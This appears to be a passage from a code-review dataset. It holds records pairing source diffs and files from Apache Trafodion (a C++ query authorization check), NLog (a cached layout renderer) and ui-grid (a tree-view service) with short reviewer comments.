(bindWA->errStatus()) return NULL; return boundExpr; } RelExpr * ControlRunningQuery::bindNode(BindWA *bindWA) { if (nodeIsBound()) { bindWA->getCurrentScope()->setRETDesc(getRETDesc()); return this; } // // Check to see if user is authorized to control this query. // if (!isUserAuthorized(bindWA)) return NULL; // // Bind the child nodes. // bindChildren(bindWA); if (bindWA->errStatus()) return this; // no rows are returned from this operator. // Allocate an empty RETDesc and attach it to this and the BindScope. // setRETDesc(new (bindWA->wHeap()) RETDesc(bindWA)); // // Bind the base class. // RelExpr *boundExpr = bindSelf(bindWA); if (bindWA->errStatus()) return boundExpr; ValueIdSet ov; getPotentialOutputValues(ov); getGroupAttr()->addCharacteristicOutputs(ov); return boundExpr; } // ControlRunningQuery::bindNode() bool ControlRunningQuery::isUserAuthorized(BindWA *bindWA) { bool userHasPriv = false; Int32 sessionID = ComUser::getSessionUser(); // Check to see if the current user owns the query id. // This only has to be done for the Cancel query request. // This option to check privilege is not available unless // the query Id was supplied. if ((action_ == Cancel) && (qs_ == ControlQid)) { // The user ID associated with the query is stored in the QID. // To be safe, copy the QID to a character string. Int32 qidLen = queryId_.length(); char *pQid = new (bindWA->wHeap()) char[qidLen+1]; str_cpy_all(pQid, queryId_.data(), qidLen); pQid[qidLen] = '\0'; // Set up the returned parameters // Max username can be (128 * 2) + 2 (delimiters) + 1 (null indicator) char username[2 * MAX_USERNAME_LEN + 2 + 1]; Int64 usernameLen = sizeof(username) - 1; // Call function to extract the username from the QID Int32 retcode = ComSqlId::getSqlQueryIdAttr(ComSqlId::SQLQUERYID_USERNAME, pQid, qidLen, usernameLen, &username[0]); if (retcode == 0) { // The username stored in the QID is actually the userID preceeded with // a "U". Check for a U and convert the succeeding characters // to integer. This integer value is compared against the current userID. username[usernameLen] = '\0'; if (username[0] == 'U') { Int64 userID = str_atoi(&username[1],usernameLen - 1); if (sessionID == userID || sessionID == ComUser::getRootUserID()) userHasPriv = true; } // If userName does not begin with a 'U', ignore and continue } // If retcode != 0, continue, an invalid QID could be specified which // is checked later in the code } // The current user does not own the query, see if the current user has // the correct QUERY privilege. Code above only supports cancel, but other // checks could be added. Component checks for all query operations. if (!userHasPriv) { SQLOperation operation; switch (ControlRunningQuery::action_) { case ControlRunningQuery::Suspend: operation = SQLOperation::QUERY_SUSPEND; break; case ControlRunningQuery::Activate: operation = SQLOperation::QUERY_ACTIVATE; break; case ControlRunningQuery::Cancel: operation = SQLOperation::QUERY_CANCEL; break; default: operation = SQLOperation::UNKNOWN; } NAString privMDLoc = CmpSeabaseDDL::getSystemCatalogStatic(); privMDLoc += ".\""; privMDLoc += SEABASE_PRIVMGR_SCHEMA; privMDLoc += "\""; PrivMgrComponentPrivileges componentPriv( privMDLoc.data(),CmpCommon::diags()); userHasPriv = componentPriv.hasSQLPriv(sessionID,operation,true); if (!userHasPriv) { // ANSI requests a special SqlState for cancel requests if (ControlRunningQuery::action_ == ControlRunningQuery::Cancel) *CmpCommon::diags() << DgSqlCode(-8029); else *CmpCommon::diags() << DgSqlCode(-1017); bindWA->setErrStatus(); } if (bindWA->errStatus()) return false; } return true; }// ControlRunningQuery::isUserAuthorized() RelExpr * OSIMControl::bindNode(BindWA *bindWA) { if (nodeIsBound()) { bindWA->getCurrentScope()->setRETDesc(getRETDesc()); return this; } //Create OptimizerSimulator if this is called first time. if(!CURRCONTEXT_OPTSIMULATOR) CURRCONTEXT_OPTSIMULATOR = new(CTXTHEAP) OptimizerSimulator(CTXTHEAP); //in respond to force option of osim load, //e.g. osim load from '/xxx/xxx/osim-dir', force //if true, when loading osim tables/views/indexes //existing objects with same qualified name //will be droped first CURRCONTEXT_OPTSIMULATOR->setForceLoad(isForceLoad()); //Set OSIM mode if(!CURRCONTEXT_OPTSIMULATOR->setOsimModeAndLogDir(targetMode_, osimLocalDir_.data())) { bindWA->setErrStatus(); return this; } return ControlAbstractClass::bindNode(bindWA); }
1
8,354
Does this mean we cannot update statistics with sampling on a table with LOB columns?
apache-trafodion
cpp
@@ -47,7 +47,18 @@ namespace NLog.LayoutRenderers.Wrappers [ThreadAgnostic] public sealed class CachedLayoutRendererWrapper : WrapperLayoutRendererBase { - private string cachedValue; + /// <summary> + /// A value indicating when the cache is cleared. + /// </summary> + public enum ClearCacheOption + { + /// <summary>Never clear the cache.</summary> + Never = 0, + /// <summary>Clear the cache whenever the <see cref="CachedLayoutRendererWrapper"/> is initialized.</summary> + OnInitialize = 1 + } + + private string cachedValue = null; /// <summary> /// Initializes a new instance of the <see cref="CachedLayoutRendererWrapper"/> class.
1
// // Copyright (c) 2004-2011 Jaroslaw Kowalski <[email protected]> // // All rights reserved. // // Redistribution and use in source and binary forms, with or without // modification, are permitted provided that the following conditions // are met: // // * Redistributions of source code must retain the above copyright notice, // this list of conditions and the following disclaimer. // // * Redistributions in binary form must reproduce the above copyright notice, // this list of conditions and the following disclaimer in the documentation // and/or other materials provided with the distribution. // // * Neither the name of Jaroslaw Kowalski nor the names of its // contributors may be used to endorse or promote products derived from this // software without specific prior written permission. // // THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" // AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE // IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE // ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE // LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR // CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF // SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS // INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN // CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) // ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF // THE POSSIBILITY OF SUCH DAMAGE. // namespace NLog.LayoutRenderers.Wrappers { using System.ComponentModel; using NLog.Config; /// <summary> /// Applies caching to another layout output. /// </summary> /// <remarks> /// The value of the inner layout will be rendered only once and reused subsequently. /// </remarks> [LayoutRenderer("cached")] [AmbientProperty("Cached")] [ThreadAgnostic] public sealed class CachedLayoutRendererWrapper : WrapperLayoutRendererBase { private string cachedValue; /// <summary> /// Initializes a new instance of the <see cref="CachedLayoutRendererWrapper"/> class. /// </summary> public CachedLayoutRendererWrapper() { this.Cached = true; } /// <summary> /// Gets or sets a value indicating whether this <see cref="CachedLayoutRendererWrapper"/> is enabled. /// </summary> /// <docgen category='Caching Options' order='10' /> [DefaultValue(true)] public bool Cached { get; set; } /// <summary> /// Initializes the layout renderer. /// </summary> protected override void InitializeLayoutRenderer() { base.InitializeLayoutRenderer(); this.cachedValue = null; } /// <summary> /// Closes the layout renderer. /// </summary> protected override void CloseLayoutRenderer() { base.CloseLayoutRenderer(); this.cachedValue = null; } /// <summary> /// Transforms the output of another layout. /// </summary> /// <param name="text">Output to be transform.</param> /// <returns>Transformed text.</returns> protected override string Transform(string text) { return text; } /// <summary> /// Renders the inner layout contents. /// </summary> /// <param name="logEvent">The log event.</param> /// <returns>Contents of inner layout.</returns> protected override string RenderInner(LogEventInfo logEvent) { if (this.Cached) { if (this.cachedValue == null) { this.cachedValue = base.RenderInner(logEvent); } return this.cachedValue; } else { return base.RenderInner(logEvent); } } } }
1
11,772
Look good, but I think a `[flags]` enum would be more future proof? Although i'm not sure if a flags-enum is working from the XML config. What do you think?
NLog-NLog
.cs
@@ -1577,6 +1577,16 @@ require: '^uiGrid', link: function($scope, $elm, $attrs, uiGridCtrl) { var self = uiGridCtrl.grid; + $scope.treeButtonClass = function(row) { + if ( ( self.options.showTreeExpandNoChildren && row.treeLevel > -1 ) || ( row.treeNode.children && row.treeNode.children.length > 0 ) ) { + if (row.treeNode.state === 'expanded' ) { + return 'ui-grid-icon-minus-squared'; + } + if (row.treeNode.state === 'collapsed' ) { + return 'ui-grid-icon-plus-squared'; + } + } + }; $scope.treeButtonClick = function(row, evt) { evt.stopPropagation(); uiGridTreeBaseService.toggleRowTreeState(self, row, evt);
1
(function () { 'use strict'; /** * @ngdoc overview * @name ui.grid.treeBase * @description * * # ui.grid.treeBase * * <div class="alert alert-warning" role="alert"><strong>Beta</strong> This feature is ready for testing, but it either hasn't seen a lot of use or has some known bugs.</div> * * This module provides base tree handling functions that are shared by other features, notably grouping * and treeView. It provides a tree view of the data, with nodes in that * tree and leaves. * * Design information: * ------------------- * * The raw data that is provided must come with a $$treeLevel on any non-leaf node. Grouping will create * these on all the group header rows, treeView will expect these to be set in the raw data by the user. * TreeBase will run a rowsProcessor that: * - builds `treeBase.tree` out of the provided rows * - permits a recursive sort of the tree * - maintains the expand/collapse state of each node * - provides the expand/collapse all button and the expand/collapse buttons * - maintains the count of children for each node * * Each row is updated with a link to the tree node that represents it. Refer {@link ui.grid.treeBase.grid:treeBase.tree tree documentation} * for information. * * TreeBase adds information to the rows * - treeLevel: if present and > -1 tells us the level (level 0 is the top level) * - treeNode: pointer to the node in the grid.treeBase.tree that refers * to this row, allowing us to manipulate the state * * Since the logic is baked into the rowsProcessors, it should get triggered whenever * row order or filtering or anything like that is changed. We recall the expanded state * across invocations of the rowsProcessors by the reference to the treeNode on the individual * rows. We rebuild the tree itself quite frequently, when we do this we use the saved treeNodes to * get the state, but we overwrite the other data in that treeNode. * * By default rows are collapsed, which means all data rows have their visible property * set to false, and only level 0 group rows are set to visible. * * We rely on the rowsProcessors to do the actual expanding and collapsing, so we set the flags we want into * grid.treeBase.tree, then call refresh. This is because we can't easily change the visible * row cache without calling the processors, and once we've built the logic into the rowProcessors we may as * well use it all the time. * * Tree base provides sorting (on non-grouped columns). * * Sorting works in two passes. The standard sorting is performed for any columns that are important to building * the tree (for example, any grouped columns). Then after the tree is built, a recursive tree sort is performed * for the remaining sort columns (including the original sort) - these columns are sorted within each tree level * (so all the level 1 nodes are sorted, then all the level 2 nodes within each level 1 node etc). * * To achieve this we make use of the `ignoreSort` property on the sort configuration. The parent feature (treeView or grouping) * must provide a rowsProcessor that runs with very low priority (typically in the 60-65 range), and that sets * the `ignoreSort`on any sort that it wants to run on the tree. TreeBase will clear the ignoreSort on all sorts - so it * will turn on any sorts that haven't run. It will then call a recursive sort on the tree. * * Tree base provides treeAggregation. It checks the treeAggregation configuration on each column, and aggregates based on * the logic provided as it builds the tree. Footer aggregation from the uiGrid core should not be used with treeBase aggregation, * since it operates on all visible rows, as opposed to to leaf nodes only. Setting `showColumnFooter: true` will show the * treeAggregations in the column footer. Aggregation information will be collected in the format: * * ``` * { * type: 'count', * value: 4, * label: 'count: ', * rendered: 'count: 4' * } * ``` * * A callback is provided to format the value once it is finalised (aka a valueFilter). * * <br/> * <br/> * * <div doc-module-components="ui.grid.treeBase"></div> */ var module = angular.module('ui.grid.treeBase', ['ui.grid']); /** * @ngdoc object * @name ui.grid.treeBase.constant:uiGridTreeBaseConstants * * @description constants available in treeBase module. * * These constants are manually copied into grouping and treeView, * as I haven't found a way to simply include them, and it's not worth * investing time in for something that changes very infrequently. * */ module.constant('uiGridTreeBaseConstants', { featureName: "treeBase", rowHeaderColName: 'treeBaseRowHeaderCol', EXPANDED: 'expanded', COLLAPSED: 'collapsed', aggregation: { COUNT: 'count', SUM: 'sum', MAX: 'max', MIN: 'min', AVG: 'avg' } }); /** * @ngdoc service * @name ui.grid.treeBase.service:uiGridTreeBaseService * * @description Services for treeBase feature */ /** * @ngdoc object * @name ui.grid.treeBase.api:ColumnDef * * @description ColumnDef for tree feature, these are available to be * set using the ui-grid {@link ui.grid.class:GridOptions.columnDef gridOptions.columnDefs} */ module.service('uiGridTreeBaseService', ['$q', 'uiGridTreeBaseConstants', 'gridUtil', 'GridRow', 'gridClassFactory', 'i18nService', 'uiGridConstants', 'rowSorter', function ($q, uiGridTreeBaseConstants, gridUtil, GridRow, gridClassFactory, i18nService, uiGridConstants, rowSorter) { var service = { initializeGrid: function (grid, $scope) { //add feature namespace and any properties to grid for needed /** * @ngdoc object * @name ui.grid.treeBase.grid:treeBase * * @description Grid properties and functions added for treeBase */ grid.treeBase = {}; /** * @ngdoc property * @propertyOf ui.grid.treeBase.grid:treeBase * @name numberLevels * * @description Total number of tree levels currently used, calculated by the rowsProcessor by * retaining the highest tree level it sees */ grid.treeBase.numberLevels = 0; /** * @ngdoc property * @propertyOf ui.grid.treeBase.grid:treeBase * @name expandAll * * @description Whether or not the expandAll box is selected */ grid.treeBase.expandAll = false; /** * @ngdoc property * @propertyOf ui.grid.treeBase.grid:treeBase * @name tree * * @description Tree represented as a nested array that holds the state of each node, along with a * pointer to the row. The array order is material - we will display the children in the order * they are stored in the array * * Each node stores: * * - the state of this node * - an array of children of this node * - a pointer to the parent of this node (reverse pointer, allowing us to walk up the tree) * - the number of children of this node * - aggregation information calculated from the nodes * * ``` * [{ * state: 'expanded', * row: <reference to row>, * parentRow: null, * aggregations: [{ * type: 'count', * col: <gridCol>, * value: 2, * label: 'count: ', * rendered: 'count: 2' * }], * children: [ * { * state: 'expanded', * row: <reference to row>, * parentRow: <reference to row>, * aggregations: [{ * type: 'count', * col: '<gridCol>, * value: 4, * label: 'count: ', * rendered: 'count: 4' * }], * children: [ * { state: 'expanded', row: <reference to row>, parentRow: <reference to row> }, * { state: 'collapsed', row: <reference to row>, parentRow: <reference to row> }, * { state: 'expanded', row: <reference to row>, parentRow: <reference to row> }, * { state: 'collapsed', row: <reference to row>, parentRow: <reference to row> } * ] * }, * { * state: 'collapsed', * row: <reference to row>, * parentRow: <reference to row>, * aggregations: [{ * type: 'count', * col: <gridCol>, * value: 3, * label: 'count: ', * rendered: 'count: 3' * }], * children: [ * { state: 'expanded', row: <reference to row>, parentRow: <reference to row> }, * { state: 'collapsed', row: <reference to row>, parentRow: <reference to row> }, * { state: 'expanded', row: <reference to row>, parentRow: <reference to row> } * ] * } * ] * }, {<another level 0 node maybe>} ] * ``` * Missing state values are false - meaning they aren't expanded. * * This is used because the rowProcessors run every time the grid is refreshed, so * we'd lose the expanded state every time the grid was refreshed. This instead gives * us a reliable lookup that persists across rowProcessors. * * This tree is rebuilt every time we run the rowsProcessors. Since each row holds a pointer * to it's tree node we can persist expand/collapse state across calls to rowsProcessor, we discard * all transient information on the tree (children, childCount) and recalculate it * */ grid.treeBase.tree = []; service.defaultGridOptions(grid.options); grid.registerRowsProcessor(service.treeRows, 410); grid.registerColumnBuilder( service.treeBaseColumnBuilder ); service.createRowHeader( grid ); /** * @ngdoc object * @name ui.grid.treeBase.api:PublicApi * * @description Public Api for treeBase feature */ var publicApi = { events: { treeBase: { /** * @ngdoc event * @eventOf ui.grid.treeBase.api:PublicApi * @name rowExpanded * @description raised whenever a row is expanded. If you are dynamically * rendering your tree you can listen to this event, and then retrieve * the children of this row and load them into the grid data. * * When the data is loaded the grid will automatically refresh to show these new rows * * <pre> * gridApi.treeBase.on.rowExpanded(scope,function(row){}) * </pre> * @param {gridRow} row the row that was expanded. You can also * retrieve the grid from this row with row.grid */ rowExpanded: {}, /** * @ngdoc event * @eventOf ui.grid.treeBase.api:PublicApi * @name rowCollapsed * @description raised whenever a row is collapsed. Doesn't really have * a purpose at the moment, included for symmetry * * <pre> * gridApi.treeBase.on.rowCollapsed(scope,function(row){}) * </pre> * @param {gridRow} row the row that was collapsed. You can also * retrieve the grid from this row with row.grid */ rowCollapsed: {} } }, methods: { treeBase: { /** * @ngdoc function * @name expandAllRows * @methodOf ui.grid.treeBase.api:PublicApi * @description Expands all tree rows */ expandAllRows: function () { service.expandAllRows(grid); }, /** * @ngdoc function * @name collapseAllRows * @methodOf ui.grid.treeBase.api:PublicApi * @description collapse all tree rows */ collapseAllRows: function () { service.collapseAllRows(grid); }, /** * @ngdoc function * @name toggleRowTreeState * @methodOf ui.grid.treeBase.api:PublicApi * @description call expand if the row is collapsed, collapse if it is expanded * @param {gridRow} row the row you wish to toggle */ toggleRowTreeState: function (row) { service.toggleRowTreeState(grid, row); }, /** * @ngdoc function * @name expandRow * @methodOf ui.grid.treeBase.api:PublicApi * @description expand the immediate children of the specified row * @param {gridRow} row the row you wish to expand * @param {boolean} recursive true if you wish to expand the row's ancients */ expandRow: function (row, recursive) { service.expandRow(grid, row, recursive); }, /** * @ngdoc function * @name expandRowChildren * @methodOf ui.grid.treeBase.api:PublicApi * @description expand all children of the specified row * @param {gridRow} row the row you wish to expand */ expandRowChildren: function (row) { service.expandRowChildren(grid, row); }, /** * @ngdoc function * @name collapseRow * @methodOf ui.grid.treeBase.api:PublicApi * @description collapse the specified row. When * you expand the row again, all grandchildren will retain their state * @param {gridRow} row the row you wish to collapse */ collapseRow: function ( row ) { service.collapseRow(grid, row); }, /** * @ngdoc function * @name collapseRowChildren * @methodOf ui.grid.treeBase.api:PublicApi * @description collapse all children of the specified row. When * you expand the row again, all grandchildren will be collapsed * @param {gridRow} row the row you wish to collapse children for */ collapseRowChildren: function ( row ) { service.collapseRowChildren(grid, row); }, /** * @ngdoc function * @name getTreeState * @methodOf ui.grid.treeBase.api:PublicApi * @description Get the tree state for this grid, * used by the saveState feature * Returned treeState as an object * `{ expandedState: { uid: 'expanded', uid: 'collapsed' } }` * where expandedState is a hash of row uid and the current expanded state * * @returns {object} tree state * * TODO - this needs work - we need an identifier that persists across instantiations, * not uid. This really means we need a row identity defined, but that won't work for * grouping. Perhaps this needs to be moved up to treeView and grouping, rather than * being in base. */ getTreeExpandedState: function () { return { expandedState: service.getTreeState(grid) }; }, /** * @ngdoc function * @name setTreeState * @methodOf ui.grid.treeBase.api:PublicApi * @description Set the expanded states of the tree * @param {object} config the config you want to apply, in the format * provided by getTreeState */ setTreeState: function ( config ) { service.setTreeState( grid, config ); }, /** * @ngdoc function * @name getRowChildren * @methodOf ui.grid.treeBase.api:PublicApi * @description Get the children of the specified row * @param {GridRow} row the row you want the children of * @returns {Array} array of children of this row, the children * are all gridRows */ getRowChildren: function ( row ){ return row.treeNode.children.map( function( childNode ){ return childNode.row; }); } } } }; grid.api.registerEventsFromObject(publicApi.events); grid.api.registerMethodsFromObject(publicApi.methods); }, defaultGridOptions: function (gridOptions) { //default option to true unless it was explicitly set to false /** * @ngdoc object * @name ui.grid.treeBase.api:GridOptions * * @description GridOptions for treeBase feature, these are available to be * set using the ui-grid {@link ui.grid.class:GridOptions gridOptions} */ /** * @ngdoc object * @name treeRowHeaderBaseWidth * @propertyOf ui.grid.treeBase.api:GridOptions * @description Base width of the tree header, provides for a single level of tree. This * is incremented by `treeIndent` for each extra level * <br/>Defaults to 30 */ gridOptions.treeRowHeaderBaseWidth = gridOptions.treeRowHeaderBaseWidth || 30; /** * @ngdoc object * @name treeIndent * @propertyOf ui.grid.treeBase.api:GridOptions * @description Number of pixels of indent for the icon at each tree level, wider indents are visually more pleasing, * but will make the tree row header wider * <br/>Defaults to 10 */ gridOptions.treeIndent = (gridOptions.treeIndent != null) ? gridOptions.treeIndent : 10; /** * @ngdoc object * @name showTreeRowHeader * @propertyOf ui.grid.treeBase.api:GridOptions * @description If set to false, don't create the row header. You'll need to programmatically control the expand * states * <br/>Defaults to true */ gridOptions.showTreeRowHeader = gridOptions.showTreeRowHeader !== false; /** * @ngdoc object * @name showTreeExpandNoChildren * @propertyOf ui.grid.treeBase.api:GridOptions * @description If set to true, show the expand/collapse button even if there are no * children of a node. You'd use this if you're planning to dynamically load the children * * <br/>Defaults to true, grouping overrides to false */ gridOptions.showTreeExpandNoChildren = gridOptions.showTreeExpandNoChildren !== false; /** * @ngdoc object * @name treeRowHeaderAlwaysVisible * @propertyOf ui.grid.treeBase.api:GridOptions * @description If set to true, row header even if there are no tree nodes * * <br/>Defaults to true */ gridOptions.treeRowHeaderAlwaysVisible = gridOptions.treeRowHeaderAlwaysVisible !== false; /** * @ngdoc object * @name treeCustomAggregations * @propertyOf ui.grid.treeBase.api:GridOptions * @description Define custom aggregation functions. The properties of this object will be * aggregation types available for use on columnDef with {@link ui.grid.treeBase.api:ColumnDef treeAggregationType} or through the column menu. * If a function defined here uses the same name as one of the native aggregations, this one will take precedence. * The object format is: * * <pre> * { * aggregationName: { * label: (optional) string, * aggregationFn: function( aggregation, fieldValue, numValue, row ){...}, * finalizerFn: (optional) function( aggregation ){...} * }, * mean: { * label: 'mean', * aggregationFn: function( aggregation, fieldValue, numValue ){ * aggregation.count = (aggregation.count || 1) + 1; * aggregation.sum = (aggregation.sum || 0) + numValue; * }, * finalizerFn: function( aggregation ){ * aggregation.value = aggregation.sum / aggregation.count * } * } * } * </pre> * * <br/>The `finalizerFn` may be used to manipulate the value before rendering, or to * apply a custom rendered value. If `aggregation.rendered` is left undefined, the value will be * rendered. Note that the native aggregation functions use an `finalizerFn` to concatenate * the label and the value. * * <br/>Defaults to {} */ gridOptions.treeCustomAggregations = gridOptions.treeCustomAggregations || {}; /** * @ngdoc object * @name enableExpandAll * @propertyOf ui.grid.treeBase.api:GridOptions * @description Enable the expand all button at the top of the row header * * <br/>Defaults to true */ gridOptions.enableExpandAll = gridOptions.enableExpandAll !== false; }, /** * @ngdoc function * @name treeBaseColumnBuilder * @methodOf ui.grid.treeBase.service:uiGridTreeBaseService * @description Sets the tree defaults based on the columnDefs * * @param {object} colDef columnDef we're basing on * @param {GridColumn} col the column we're to update * @param {object} gridOptions the options we should use * @returns {promise} promise for the builder - actually we do it all inline so it's immediately resolved */ treeBaseColumnBuilder: function (colDef, col, gridOptions) { /** * @ngdoc object * @name customTreeAggregationFn * @propertyOf ui.grid.treeBase.api:ColumnDef * @description A custom function that aggregates rows into some form of * total. Aggregations run row-by-row, the function needs to be capable of * creating a running total. * * The function will be provided the aggregation item (in which you can store running * totals), the row value that is to be aggregated, and that same row value converted to * a number (most aggregations work on numbers) * @example * <pre> * customTreeAggregationFn = function ( aggregation, fieldValue, numValue, row ){ * // calculates the average of the squares of the values * if ( typeof(aggregation.count) === 'undefined' ){ * aggregation.count = 0; * } * aggregation.count++; * * if ( !isNaN(numValue) ){ * if ( typeof(aggregation.total) === 'undefined' ){ * aggregation.total = 0; * } * aggregation.total = aggregation.total + numValue * numValue; * } * * aggregation.value = aggregation.total / aggregation.count; * } * </pre> * <br/>Defaults to undefined. May be overwritten by treeAggregationType, the two options should not be used together. */ if ( typeof(colDef.customTreeAggregationFn) !== 'undefined' ){ col.treeAggregationFn = colDef.customTreeAggregationFn; } /** * @ngdoc object * @name treeAggregationType * @propertyOf ui.grid.treeBase.api:ColumnDef * @description Use one of the native or grid-level aggregation methods for calculating aggregations on this column. * Native method are in the constants file and include: SUM, COUNT, MIN, MAX, AVG. This may also be the property the * name of an aggregation function defined with {@link ui.grid.treeBase.api:GridOptions treeCustomAggregations}. * * <pre> * treeAggregationType = uiGridTreeBaseConstants.aggregation.SUM, * } * </pre> * * If you are using aggregations you should either: * * - also use grouping, in which case the aggregations are displayed in the group header, OR * - use treeView, in which case you can set `treeAggregationUpdateEntity: true` in the colDef, and * treeBase will store the aggregation information in the entity, or you can set `treeAggregationUpdateEntity: false` * in the colDef, and you need to manual retrieve the calculated aggregations from the row.treeNode.aggregations * * <br/>Takes precendence over a treeAggregationFn, the two options should not be used together. * <br/>Defaults to undefined. */ if ( typeof(colDef.treeAggregationType) !== 'undefined' ){ col.treeAggregation = { type: colDef.treeAggregationType }; if ( typeof(gridOptions.treeCustomAggregations[colDef.treeAggregationType]) !== 'undefined' ){ col.treeAggregationFn = gridOptions.treeCustomAggregations[colDef.treeAggregationType].aggregationFn; col.treeAggregationFinalizerFn = gridOptions.treeCustomAggregations[colDef.treeAggregationType].finalizerFn; col.treeAggregation.label = gridOptions.treeCustomAggregations[colDef.treeAggregationType].label; } else if ( typeof(service.nativeAggregations()[colDef.treeAggregationType]) !== 'undefined' ){ col.treeAggregationFn = service.nativeAggregations()[colDef.treeAggregationType].aggregationFn; col.treeAggregation.label = service.nativeAggregations()[colDef.treeAggregationType].label; } } /** * @ngdoc object * @name treeAggregationLabel * @propertyOf ui.grid.treeBase.api:ColumnDef * @description A custom label to use for this aggregation. If provided we don't use native i18n. */ if ( typeof(colDef.treeAggregationLabel) !== 'undefined' ){ if (typeof(col.treeAggregation) === 'undefined' ){ col.treeAggregation = {}; } col.treeAggregation.label = colDef.treeAggregationLabel; } /** * @ngdoc object * @name treeAggregationUpdateEntity * @propertyOf ui.grid.treeBase.api:ColumnDef * @description Store calculated aggregations into the entity, allowing them * to be displayed in the grid using a standard cellTemplate. This defaults to true, * if you are using grouping then you shouldn't set it to false, as then the aggregations won't * display. * * If you are using treeView in most cases you'll want to set this to true. This will result in * getCellValue returning the aggregation rather than whatever was stored in the cell attribute on * the entity. If you want to render the underlying entity value (and do something else with the aggregation) * then you could use a custom cellTemplate to display `row.entity.myAttribute`, rather than using getCellValue. * * <br/>Defaults to true * * @example * <pre> * gridOptions.columns = [{ * name: 'myCol', * treeAggregation: { type: uiGridTreeBaseConstants.aggregation.SUM }, * treeAggregationUpdateEntity: true * cellTemplate: '<div>{{row.entity.myCol + " " + row.treeNode.aggregations[0].rendered}}</div>' * }]; * </pre> */ col.treeAggregationUpdateEntity = colDef.treeAggregationUpdateEntity !== false; /** * @ngdoc object * @name customTreeAggregationFinalizerFn * @propertyOf ui.grid.treeBase.api:ColumnDef * @description A custom function that populates aggregation.rendered, this is called when * a particular aggregation has been fully calculated, and we want to render the value. * * With the native aggregation options we just concatenate `aggregation.label` and * `aggregation.value`, but if you wanted to apply a filter or otherwise manipulate the label * or the value, you can do so with this function. This function will be called after the * the default `finalizerFn`. * * @example * <pre> * customTreeAggregationFinalizerFn = function ( aggregation ){ * aggregation.rendered = aggregation.label + aggregation.value / 100 + '%'; * } * </pre> * <br/>Defaults to undefined. */ if ( typeof(col.customTreeAggregationFinalizerFn) === 'undefined' ){ col.customTreeAggregationFinalizerFn = colDef.customTreeAggregationFinalizerFn; } }, /** * @ngdoc function * @name createRowHeader * @methodOf ui.grid.treeBase.service:uiGridTreeBaseService * @description Create the rowHeader. If treeRowHeaderAlwaysVisible then * set it to visible, otherwise set it to invisible * * @param {Grid} grid grid object */ createRowHeader: function( grid ){ var rowHeaderColumnDef = { name: uiGridTreeBaseConstants.rowHeaderColName, displayName: '', width: grid.options.treeRowHeaderBaseWidth, minWidth: 10, cellTemplate: 'ui-grid/treeBaseRowHeader', headerCellTemplate: 'ui-grid/treeBaseHeaderCell', enableColumnResizing: false, enableColumnMenu: false, exporterSuppressExport: true, allowCellFocus: true }; rowHeaderColumnDef.visible = grid.options.treeRowHeaderAlwaysVisible; grid.addRowHeaderColumn(rowHeaderColumnDef, -100); }, /** * @ngdoc function * @name expandAllRows * @methodOf ui.grid.treeBase.service:uiGridTreeBaseService * @description Expands all nodes in the tree * * @param {Grid} grid grid object */ expandAllRows: function (grid) { grid.treeBase.tree.forEach( function( node ) { service.setAllNodes( grid, node, uiGridTreeBaseConstants.EXPANDED); }); grid.treeBase.expandAll = true; grid.queueGridRefresh(); }, /** * @ngdoc function * @name collapseAllRows * @methodOf ui.grid.treeBase.service:uiGridTreeBaseService * @description Collapses all nodes in the tree * * @param {Grid} grid grid object */ collapseAllRows: function (grid) { grid.treeBase.tree.forEach( function( node ) { service.setAllNodes( grid, node, uiGridTreeBaseConstants.COLLAPSED); }); grid.treeBase.expandAll = false; grid.queueGridRefresh(); }, /** * @ngdoc function * @name setAllNodes * @methodOf ui.grid.treeBase.service:uiGridTreeBaseService * @description Works through a subset of grid.treeBase.rowExpandedStates, setting * all child nodes (and their descendents) of the provided node to the given state. * * Calls itself recursively on all nodes so as to achieve this. * * @param {Grid} grid the grid we're operating on (so we can raise events) * @param {object} treeNode a node in the tree that we want to update * @param {string} targetState the state we want to set it to */ setAllNodes: function (grid, treeNode, targetState) { if ( typeof(treeNode.state) !== 'undefined' && treeNode.state !== targetState ){ treeNode.state = targetState; if ( targetState === uiGridTreeBaseConstants.EXPANDED ){ grid.api.treeBase.raise.rowExpanded(treeNode.row); } else { grid.api.treeBase.raise.rowCollapsed(treeNode.row); } } // set all child nodes if ( treeNode.children ){ treeNode.children.forEach(function( childNode ){ service.setAllNodes(grid, childNode, targetState); }); } }, /** * @ngdoc function * @name toggleRowTreeState * @methodOf ui.grid.treeBase.service:uiGridTreeBaseService * @description Toggles the expand or collapse state of this grouped row, if * it's a parent row * * @param {Grid} grid grid object * @param {GridRow} row the row we want to toggle */ toggleRowTreeState: function ( grid, row ){ if ( typeof(row.treeLevel) === 'undefined' || row.treeLevel === null || row.treeLevel < 0 ){ return; } if (row.treeNode.state === uiGridTreeBaseConstants.EXPANDED){ service.collapseRow(grid, row); } else { service.expandRow(grid, row, false); } grid.queueGridRefresh(); }, /** * @ngdoc function * @name expandRow * @methodOf ui.grid.treeBase.service:uiGridTreeBaseService * @description Expands this specific row, showing only immediate children. * * @param {Grid} grid grid object * @param {GridRow} row the row we want to expand * @param {boolean} recursive true if you wish to expand the row's ancients */ expandRow: function ( grid, row, recursive ){ if ( recursive ){ var parents = []; while ( row && typeof(row.treeLevel) !== 'undefined' && row.treeLevel !== null && row.treeLevel >= 0 && row.treeNode.state !== uiGridTreeBaseConstants.EXPANDED ){ parents.push(row); row = row.treeNode.parentRow; } if ( parents.length > 0 ){ row = parents.pop(); while ( row ){ row.treeNode.state = uiGridTreeBaseConstants.EXPANDED; grid.api.treeBase.raise.rowExpanded(row); row = parents.pop(); } grid.treeBase.expandAll = service.allExpanded(grid.treeBase.tree); grid.queueGridRefresh(); } } else { if ( typeof(row.treeLevel) === 'undefined' || row.treeLevel === null || row.treeLevel < 0 ){ return; } if ( row.treeNode.state !== 